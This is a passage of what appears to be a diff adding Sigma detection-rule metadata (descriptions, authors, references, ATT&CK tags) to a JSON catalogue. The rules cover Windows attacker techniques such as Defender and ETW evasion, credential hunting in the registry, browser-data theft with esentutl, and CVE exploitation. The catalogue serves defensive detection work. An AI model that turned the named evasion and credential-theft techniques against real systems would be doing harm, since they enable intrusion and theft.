plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/05/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_dns_serverlevelplugindll.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_serverlevelplugindll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" + ] + }, + "uuid": "f63b56ee-3f79-4b8a-97fb-5c48007e8573", + "value": "DNS ServerLevelPluginDll Install" + }, + { + "description": "dotnet.exe will execute any DLL and execute unsigned 
code", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_dotnet.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", + "https://twitter.com/_felamos/status/1204705548668555264", + "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", + "value": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN" + }, + { + "description": "Detects usage of Dsacls to grant over permissive permissions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administrators granting over permissive permissions to users" + ], + "filename": "proc_creation_win_dsacls_abuse_permissions.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ss64.com/nt/dsacls.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "01c42d3c-242d-4655-85b2-34f1739632f7", + "value": "Abusing Permissions Using Dsacls" + }, + { + "description": "Detects possible password spraying attempts using Dsacls", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate use of dsacls to bind to an LDAP session" + ], + "filename": 
"proc_creation_win_dsacls_password_spray.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/using-dsacls-to-check-ad-object-permissions#password-spraying-anyone", + "https://ss64.com/nt/dsacls.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_password_spray.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "value": "Password Spraying Attempts Using Dsacls" + }, + { + "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", + "meta": { + "author": "frack113", + "creation_date": "2022/01/16", + "falsepositive": [ + "Legitimate script" + ], + "filename": "proc_creation_win_dsim_remove.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", + "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "43e32da2-fdd0-4156-90de-50dfd62636f9", + "value": "Dism Remove Online Package" + }, + { + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/06", 
+ "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_dumpstack_log_evasion.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1479094189048713219", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpstack_log_evasion.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "4f647cfa-b598-4e12-ad69-c68dd16caef8", + "value": "DumpStack.log Defender Evasion" + }, + { + "description": "Detects email exfiltration via powershell cmdlets", + "meta": { + "author": "Nasreddine Bencherchali (rule), Azure-Sentinel (idea)", + "creation_date": "2022/09/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_email_exfil_via_powershell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_email_exfil_via_powershell.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "312d0384-401c-4b8b-abdf-685ffba9a332", + "value": "Email Exifiltration Via Powershell" + }, + { + "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "meta": { + "author": "frack113", + "creation_date": "2022/02/06", + "falsepositive": [ + "Legitimate commands in .lnk files" + ], + "filename": "proc_creation_win_embed_exe_lnk.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.x86matthew.com/view_post?id=embed_exe_lnk", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_embed_exe_lnk.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", + "value": "Hidden Powershell in Link File Pattern" + }, + { + "description": "Detects a base64 encoded FromBase64String keyword in a process command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_encoded_frombase64string.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_frombase64string.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1140", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", + "value": "Encoded FromBase64String" + }, + { + "description": "Detects a base64 encoded IEX command string in a process command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_encoded_iex.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_encoded_iex.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "88f680b8-070e-402c-ae11-d2914f2257f1", + "value": "Encoded IEX" + }, + { + "description": "Detects processes that query known 3rd party registry keys that holds credentials via commandline", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_enumeration_for_credentials_cli.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://isc.sans.edu/diary/More+Data+Exfiltration/25698", + "https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt", + "https://github.com/HyperSine/how-does-MobaXterm-encrypt-password", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#inside-the-registry", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_cli.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.002" + ] + }, + "uuid": "87a476dc-0079-4583-a985-dee7a20a03de", + "value": "Enumeration for 3rd Party Creds From CLI" + }, + { + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_enumeration_for_credentials_in_registry.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_in_registry.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.002" + ] + }, + "uuid": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "value": "Enumeration for Credentials in Registry" + }, + { + "description": "One way Qbot steals 
sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_esentutl_webcache.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://redcanary.com/threat-detection-report/threats/qbot/", + "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_webcache.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ] + }, + "uuid": "6a69f62d-ce75-4b57-8dce-6351eb55b362", + "value": "Esentutl Steals Browser Information" + }, + { + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_etw_modification_cmdline.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_xpn_/status/1268712093928378368", + "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr", + "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables", + "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38", + 
"https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39", + "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_", + "https://bunnyinside.com/?term=f71e8cb9c76a", + "http://managed670.rssing.com/chan-5590147/all_p1.html", + "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "41421f44-58f9-455d-838a-c398859841d4", + "value": "COMPlus_ETWEnabled Command Line Arguments" + }, + { + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "meta": { + "author": "@neu5ron, Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/03/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_etw_trace_evasion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", + "https://abuse.io/lockergoga.txt", + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" + ] + }, + "uuid": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", + "value": "Disable of ETW Trace" + }, + { + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). 
The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_evil_winrm.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm", + "https://github.com/Hackplayers/evil-winrm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_evil_winrm.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "value": "WinRM Access with Evil-WinRM" + }, + { + "description": "Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "344482e4-a477-436c-aa70-7536d18a48c7", + "value": "Execution via MSSQL Xp_cmdshell Stored Procedure" + }, + { + "description": "Execution of well known tools for data exfiltration and tunneling", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate 
Administrator using tools" + ], + "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.command_and_control", + "attack.t1041", + "attack.t1572", + "attack.t1071.001" + ] + }, + "uuid": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", + "value": "Exfiltration and Tunneling Tools Execution" + }, + { + "description": "Detects the use of various cli utility related to web request exfiltrating data", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/02", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_exfil_data_via_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "value": "Possible Exfiltration Of Data Via CLI" + }, + { + "description": "Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/07/30", + "falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_expand_cabinet_files.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", + "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "9f107a84-532c-41af-b005-8d12a607639f", + "value": "Cabinet File Expansion" + }, + { + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2015_1641.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/", + "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.005" + ] + }, + "uuid": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "value": "Exploit for CVE-2015-1641" + }, + { + "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/22", + "falsepositive": [ + "Several false positives identified, check for suspicious file names or locations (e.g. 
Temp folders)" + ], + "filename": "proc_creation_win_exploit_cve_2017_0261.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "864403a1-36c9-40a2-a982-4c9a45f7d833", + "value": "Exploit for CVE-2017-0261" + }, + { + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/11/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2017_11882.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", + "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "value": "Droppers Exploiting CVE-2017-11882" + }, + { + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/09/15", + "falsepositive": [ + "Unknown" + ], + "filename": 
"proc_creation_win_exploit_cve_2017_8759.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "fdd84c68-a1f6-47c9-9477-920584f94905", + "value": "Exploit for CVE-2017-8759" + }, + { + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "meta": { + "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/11/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2019_1378.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" + ] + }, + "uuid": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "value": "Exploiting SetupComplete.cmd CVE-2019-1378" + }, + { + "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", + "meta": { + "author": "Florian Roth", + 
"creation_date": "2019/11/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2019_1388.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388", + "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", + "value": "Exploiting CVE-2019-1388" + }, + { + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/03/25", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_cve_2020_10189.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" + ] + }, + "uuid": "846b866e-2a57-46ee-8e16-85fa92759be7", + "value": "Exploited CVE-2020-10189 Zoho ManageEngine" + }, + { + "description": "Detects new commands that add new printer port which point to suspicious file", + "meta": { + "author": "EagleEye Team, Florian Roth", + "creation_date": "2020/05/13", + "falsepositive": 
[ + "New printer port install on host" + ], + "filename": "proc_creation_win_exploit_cve_2020_1048.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://windows-internals.com/printdemon-cve-2020-1048/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1048.yml" + ], + "tags": [ + "attack.persistence", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "cc08d590-8b90-413a-aff6-31d1a99678d7", + "value": "Suspicious PrinterPorts Creation (CVE-2020-1048)" + }, + { + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/15", + "falsepositive": [ + "Unknown but benign sub processes of the Windows DNS service dns.exe" + ], + "filename": "proc_creation_win_exploit_cve_2020_1350.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", + "https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "value": "DNS RCE CVE-2020-1350" + }, + { + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 to spawn a cmd.exe with LOCAL_SYSTEM rights", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_lpe_cve_2021_41379.yml", + "level": "critical", + "logsource.category": "process_creation", + 
"logsource.product": "windows", + "refs": [ + "https://github.com/klinix5/InstallerFileTakeOver", + "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "af8bbce4-f751-46b4-8d91-82a33a736f61", + "value": "Possible InstallerFileTakeOver LPE CVE-2021-41379" + }, + { + "description": "Detects the exploitation of PrinterNightmare to get a shell as LOCAL_SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_systemnightmare.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/GossiTheDog/SystemNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "value": "SystemNightmare Exploitation Script Execution" + }, + { + "description": "Rename as a legitimate Sysinternals Suite tool to evade detection", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_false_sysinternalsuite.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_false_sysinternalsuite.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "value": "False 
Sysinternals Suite Tools" + }, + { + "description": "Detects a file or folder's permissions being modified or tampered with.", + "meta": { + "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/10/23", + "falsepositive": [ + "Users interacting with the files on their own (unlikely unless privileged users).", + "Dynatrace app" + ], + "filename": "proc_creation_win_file_permission_modifications.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", + "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ] + }, + "uuid": "37ae075c-271b-459b-8d7b-55ad5f993dd8", + "value": "File or Folder Permissions Modifications" + }, + { + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
